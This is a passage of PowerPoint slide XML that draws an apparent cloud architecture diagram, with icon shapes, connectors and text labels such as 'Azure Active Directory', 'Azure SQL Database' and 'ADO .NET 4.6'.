                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Azure</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="896181" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzPct val="80000"/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1567" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="FCFCFC">
                        <a:alpha val="99000"/>
                      </a:srgbClr>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semilight"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Active Directory</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Freeform 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{082B5F7A-D8CE-4814-9CF9-3BE84AB3F3A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5826612" y="2740830"/>
              <a:ext cx="907395" cy="815464"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 100 w 202"/>
                <a:gd name="T1" fmla="*/ 12 h 239"/>
                <a:gd name="T2" fmla="*/ 184 w 202"/>
                <a:gd name="T3" fmla="*/ 36 h 239"/>
                <a:gd name="T4" fmla="*/ 100 w 202"/>
                <a:gd name="T5" fmla="*/ 60 h 239"/>
                <a:gd name="T6" fmla="*/ 16 w 202"/>
                <a:gd name="T7" fmla="*/ 36 h 239"/>
                <a:gd name="T8" fmla="*/ 100 w 202"/>
                <a:gd name="T9" fmla="*/ 12 h 239"/>
                <a:gd name="T10" fmla="*/ 101 w 202"/>
                <a:gd name="T11" fmla="*/ 0 h 239"/>
                <a:gd name="T12" fmla="*/ 61 w 202"/>
                <a:gd name="T13" fmla="*/ 3 h 239"/>
                <a:gd name="T14" fmla="*/ 29 w 202"/>
                <a:gd name="T15" fmla="*/ 12 h 239"/>
                <a:gd name="T16" fmla="*/ 8 w 202"/>
                <a:gd name="T17" fmla="*/ 24 h 239"/>
                <a:gd name="T18" fmla="*/ 2 w 202"/>
                <a:gd name="T19" fmla="*/ 32 h 239"/>
                <a:gd name="T20" fmla="*/ 0 w 202"/>
                <a:gd name="T21" fmla="*/ 40 h 239"/>
                <a:gd name="T22" fmla="*/ 0 w 202"/>
                <a:gd name="T23" fmla="*/ 199 h 239"/>
                <a:gd name="T24" fmla="*/ 2 w 202"/>
                <a:gd name="T25" fmla="*/ 207 h 239"/>
                <a:gd name="T26" fmla="*/ 8 w 202"/>
                <a:gd name="T27" fmla="*/ 215 h 239"/>
                <a:gd name="T28" fmla="*/ 29 w 202"/>
                <a:gd name="T29" fmla="*/ 227 h 239"/>
                <a:gd name="T30" fmla="*/ 61 w 202"/>
                <a:gd name="T31" fmla="*/ 236 h 239"/>
                <a:gd name="T32" fmla="*/ 101 w 202"/>
                <a:gd name="T33" fmla="*/ 239 h 239"/>
                <a:gd name="T34" fmla="*/ 172 w 202"/>
                <a:gd name="T35" fmla="*/ 227 h 239"/>
                <a:gd name="T36" fmla="*/ 194 w 202"/>
                <a:gd name="T37" fmla="*/ 215 h 239"/>
                <a:gd name="T38" fmla="*/ 200 w 202"/>
                <a:gd name="T39" fmla="*/ 207 h 239"/>
                <a:gd name="T40" fmla="*/ 202 w 202"/>
                <a:gd name="T41" fmla="*/ 199 h 239"/>
                <a:gd name="T42" fmla="*/ 202 w 202"/>
                <a:gd name="T43" fmla="*/ 40 h 239"/>
                <a:gd name="T44" fmla="*/ 194 w 202"/>
                <a:gd name="T45" fmla="*/ 24 h 239"/>
                <a:gd name="T46" fmla="*/ 172 w 202"/>
                <a:gd name="T47" fmla="*/ 12 h 239"/>
                <a:gd name="T48" fmla="*/ 140 w 202"/>
                <a:gd name="T49" fmla="*/ 3 h 239"/>
                <a:gd name="T50" fmla="*/ 101 w 202"/>
                <a:gd name="T5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 h="239">
                  <a:moveTo>
                    <a:pt x="100" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="12"/>
                    <a:pt x="184" y="23"/>
                    <a:pt x="184" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="49"/>
                    <a:pt x="146" y="60"/>
                    <a:pt x="100" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="60"/>
                    <a:pt x="16" y="49"/>
                    <a:pt x="16" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="23"/>
                    <a:pt x="54" y="12"/>
                    <a:pt x="100" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="101" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="3"/>
                    <a:pt x="61" y="3"/>
                    <a:pt x="61" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="12"/>
                    <a:pt x="29" y="12"/>
                    <a:pt x="29" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="24"/>
                    <a:pt x="8" y="24"/>
                    <a:pt x="8" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="32"/>
                    <a:pt x="2" y="32"/>
                    <a:pt x="2" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="199"/>
                    <a:pt x="0" y="199"/>
                    <a:pt x="0" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="207"/>
                    <a:pt x="2" y="207"/>
                    <a:pt x="2" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="215"/>
                    <a:pt x="8" y="215"/>
                    <a:pt x="8" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="227"/>
                    <a:pt x="29" y="227"/>
                    <a:pt x="29" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="236"/>
                    <a:pt x="61" y="236"/>
                    <a:pt x="61" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="238"/>
                    <a:pt x="87" y="239"/>
                    <a:pt x="101" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="239"/>
                    <a:pt x="154" y="234"/>
                    <a:pt x="172" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="224"/>
                    <a:pt x="189" y="219"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="212"/>
                    <a:pt x="198" y="210"/>
                    <a:pt x="200" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="205"/>
                    <a:pt x="202" y="202"/>
                    <a:pt x="202" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="40"/>
                    <a:pt x="202" y="40"/>
                    <a:pt x="202" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="34"/>
                    <a:pt x="199" y="29"/>
                    <a:pt x="194" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="20"/>
                    <a:pt x="181" y="15"/>
                    <a:pt x="172" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="8"/>
                    <a:pt x="152" y="5"/>
                    <a:pt x="140" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="1"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="101" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="89617" tIns="44808" rIns="89617" bIns="44808"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Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22B27668-1135-4E27-BD1A-C55FE4333AD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5143324" y="2116364"/>
              <a:ext cx="2191741" cy="675884"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="896181" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzPct val="80000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1567" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FCFCFC">
                      <a:alpha val="99000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Azure</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="896181" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzPct val="80000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1567" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FCFCFC">
                      <a:alpha val="99000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>SQL Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rounded Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1657C3C-1194-4B5C-8975-546F77AD402C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4482827" y="4294892"/>
              <a:ext cx="1361587" cy="88985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6181" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1175" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>ADO </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="896181" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1175" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>.NET 4.6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Connector 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C00B06-7C40-46A1-A10F-799AAB0F74E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:endCxn id="48" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2690965" y="3103948"/>
              <a:ext cx="940010" cy="319933"/>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7497F4-2E7D-46C6-A57F-3436CA567461}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3049568" y="3039059"/>
              <a:ext cx="609726" cy="34142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Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59311AAA-9C8B-49A4-B736-17C0E4E4A777}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2869108" y="2525433"/>
              <a:ext cx="252051" cy="617132"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 439 w 530"/>
                <a:gd name="T1" fmla="*/ 318 h 1297"/>
                <a:gd name="T2" fmla="*/ 91 w 530"/>
                <a:gd name="T3" fmla="*/ 318 h 1297"/>
                <a:gd name="T4" fmla="*/ 0 w 530"/>
                <a:gd name="T5" fmla="*/ 409 h 1297"/>
                <a:gd name="T6" fmla="*/ 0 w 530"/>
                <a:gd name="T7" fmla="*/ 822 h 1297"/>
                <a:gd name="T8" fmla="*/ 91 w 530"/>
                <a:gd name="T9" fmla="*/ 913 h 1297"/>
                <a:gd name="T10" fmla="*/ 91 w 530"/>
                <a:gd name="T11" fmla="*/ 1206 h 1297"/>
                <a:gd name="T12" fmla="*/ 179 w 530"/>
                <a:gd name="T13" fmla="*/ 1297 h 1297"/>
                <a:gd name="T14" fmla="*/ 352 w 530"/>
                <a:gd name="T15" fmla="*/ 1297 h 1297"/>
                <a:gd name="T16" fmla="*/ 439 w 530"/>
                <a:gd name="T17" fmla="*/ 1206 h 1297"/>
                <a:gd name="T18" fmla="*/ 439 w 530"/>
                <a:gd name="T19" fmla="*/ 913 h 1297"/>
                <a:gd name="T20" fmla="*/ 530 w 530"/>
                <a:gd name="T21" fmla="*/ 822 h 1297"/>
                <a:gd name="T22" fmla="*/ 530 w 530"/>
                <a:gd name="T23" fmla="*/ 409 h 1297"/>
                <a:gd name="T24" fmla="*/ 439 w 530"/>
                <a:gd name="T25" fmla="*/ 318 h 1297"/>
                <a:gd name="T26" fmla="*/ 409 w 530"/>
                <a:gd name="T27" fmla="*/ 824 h 1297"/>
                <a:gd name="T28" fmla="*/ 121 w 530"/>
                <a:gd name="T29" fmla="*/ 824 h 1297"/>
                <a:gd name="T30" fmla="*/ 121 w 530"/>
                <a:gd name="T31" fmla="*/ 623 h 1297"/>
                <a:gd name="T32" fmla="*/ 145 w 530"/>
                <a:gd name="T33" fmla="*/ 600 h 1297"/>
                <a:gd name="T34" fmla="*/ 170 w 530"/>
                <a:gd name="T35" fmla="*/ 600 h 1297"/>
                <a:gd name="T36" fmla="*/ 170 w 530"/>
                <a:gd name="T37" fmla="*/ 478 h 1297"/>
                <a:gd name="T38" fmla="*/ 255 w 530"/>
                <a:gd name="T39" fmla="*/ 393 h 1297"/>
                <a:gd name="T40" fmla="*/ 275 w 530"/>
                <a:gd name="T41" fmla="*/ 393 h 1297"/>
                <a:gd name="T42" fmla="*/ 360 w 530"/>
                <a:gd name="T43" fmla="*/ 478 h 1297"/>
                <a:gd name="T44" fmla="*/ 360 w 530"/>
                <a:gd name="T45" fmla="*/ 600 h 1297"/>
                <a:gd name="T46" fmla="*/ 385 w 530"/>
                <a:gd name="T47" fmla="*/ 600 h 1297"/>
                <a:gd name="T48" fmla="*/ 409 w 530"/>
                <a:gd name="T49" fmla="*/ 623 h 1297"/>
                <a:gd name="T50" fmla="*/ 409 w 530"/>
                <a:gd name="T51" fmla="*/ 824 h 1297"/>
                <a:gd name="T52" fmla="*/ 265 w 530"/>
                <a:gd name="T53" fmla="*/ 291 h 1297"/>
                <a:gd name="T54" fmla="*/ 410 w 530"/>
                <a:gd name="T55" fmla="*/ 145 h 1297"/>
                <a:gd name="T56" fmla="*/ 265 w 530"/>
                <a:gd name="T57" fmla="*/ 0 h 1297"/>
                <a:gd name="T58" fmla="*/ 121 w 530"/>
                <a:gd name="T59" fmla="*/ 145 h 1297"/>
                <a:gd name="T60" fmla="*/ 265 w 530"/>
                <a:gd name="T61" fmla="*/ 291 h 1297"/>
                <a:gd name="T62" fmla="*/ 275 w 530"/>
                <a:gd name="T63" fmla="*/ 427 h 1297"/>
                <a:gd name="T64" fmla="*/ 255 w 530"/>
                <a:gd name="T65" fmla="*/ 427 h 1297"/>
                <a:gd name="T66" fmla="*/ 205 w 530"/>
                <a:gd name="T67" fmla="*/ 478 h 1297"/>
                <a:gd name="T68" fmla="*/ 205 w 530"/>
                <a:gd name="T69" fmla="*/ 600 h 1297"/>
                <a:gd name="T70" fmla="*/ 326 w 530"/>
                <a:gd name="T71" fmla="*/ 600 h 1297"/>
                <a:gd name="T72" fmla="*/ 326 w 530"/>
                <a:gd name="T73" fmla="*/ 478 h 1297"/>
                <a:gd name="T74" fmla="*/ 275 w 530"/>
                <a:gd name="T75" fmla="*/ 427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0" h="1297">
                  <a:moveTo>
                    <a:pt x="439" y="318"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="318"/>
                    <a:pt x="91" y="318"/>
                    <a:pt x="91" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="318"/>
                    <a:pt x="0" y="360"/>
                    <a:pt x="0" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="822"/>
                    <a:pt x="0" y="822"/>
                    <a:pt x="0" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="872"/>
                    <a:pt x="42" y="913"/>
                    <a:pt x="91" y="913"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="1203"/>
                    <a:pt x="91" y="1206"/>
                    <a:pt x="91" y="1206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="1255"/>
                    <a:pt x="129" y="1297"/>
                    <a:pt x="179" y="1297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="1297"/>
                    <a:pt x="352" y="1297"/>
                    <a:pt x="352" y="1297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="1297"/>
                    <a:pt x="439" y="1255"/>
                    <a:pt x="439" y="1206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="439" y="913"/>
                    <a:pt x="439" y="913"/>
                    <a:pt x="439" y="913"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="913"/>
                    <a:pt x="530" y="872"/>
                    <a:pt x="530" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530" y="409"/>
                    <a:pt x="530" y="409"/>
                    <a:pt x="530" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530" y="360"/>
                    <a:pt x="489" y="318"/>
                    <a:pt x="439" y="318"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="409" y="824"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="824"/>
                    <a:pt x="121" y="824"/>
                    <a:pt x="121" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="623"/>
                    <a:pt x="121" y="623"/>
                    <a:pt x="121" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="610"/>
                    <a:pt x="132" y="600"/>
                    <a:pt x="145" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="600"/>
                    <a:pt x="170" y="600"/>
                    <a:pt x="170" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="478"/>
                    <a:pt x="170" y="478"/>
                    <a:pt x="170" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="431"/>
                    <a:pt x="208" y="393"/>
                    <a:pt x="255" y="393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="393"/>
                    <a:pt x="275" y="393"/>
                    <a:pt x="275" y="393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="393"/>
                    <a:pt x="360" y="431"/>
                    <a:pt x="360" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="600"/>
                    <a:pt x="360" y="600"/>
                    <a:pt x="360" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="600"/>
                    <a:pt x="385" y="600"/>
                    <a:pt x="385" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="600"/>
                    <a:pt x="409" y="610"/>
                    <a:pt x="409" y="623"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="409" y="824"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265" y="291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="291"/>
                    <a:pt x="410" y="226"/>
                    <a:pt x="410" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="65"/>
                    <a:pt x="345" y="0"/>
                    <a:pt x="265" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="0"/>
                    <a:pt x="121" y="65"/>
                    <a:pt x="121" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="226"/>
                    <a:pt x="185" y="291"/>
                    <a:pt x="265" y="291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275" y="427"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="427"/>
                    <a:pt x="255" y="427"/>
                    <a:pt x="255" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="427"/>
                    <a:pt x="205" y="450"/>
                    <a:pt x="205" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="600"/>
                    <a:pt x="205" y="600"/>
                    <a:pt x="205" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="600"/>
                    <a:pt x="326" y="600"/>
                    <a:pt x="326" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="478"/>
                    <a:pt x="326" y="478"/>
                    <a:pt x="326" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="450"/>
                    <a:pt x="303" y="427"/>
                    <a:pt x="275" y="427"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="89617" tIns="44808" rIns="89617" bIns="44808"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Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651DE4D9-8BA1-4472-ABC8-AD80338C145E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2395123" y="2767273"/>
              <a:ext cx="252051" cy="617132"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 439 w 530"/>
                <a:gd name="T1" fmla="*/ 318 h 1297"/>
                <a:gd name="T2" fmla="*/ 91 w 530"/>
                <a:gd name="T3" fmla="*/ 318 h 1297"/>
                <a:gd name="T4" fmla="*/ 0 w 530"/>
                <a:gd name="T5" fmla="*/ 409 h 1297"/>
                <a:gd name="T6" fmla="*/ 0 w 530"/>
                <a:gd name="T7" fmla="*/ 822 h 1297"/>
                <a:gd name="T8" fmla="*/ 91 w 530"/>
                <a:gd name="T9" fmla="*/ 913 h 1297"/>
                <a:gd name="T10" fmla="*/ 91 w 530"/>
                <a:gd name="T11" fmla="*/ 1206 h 1297"/>
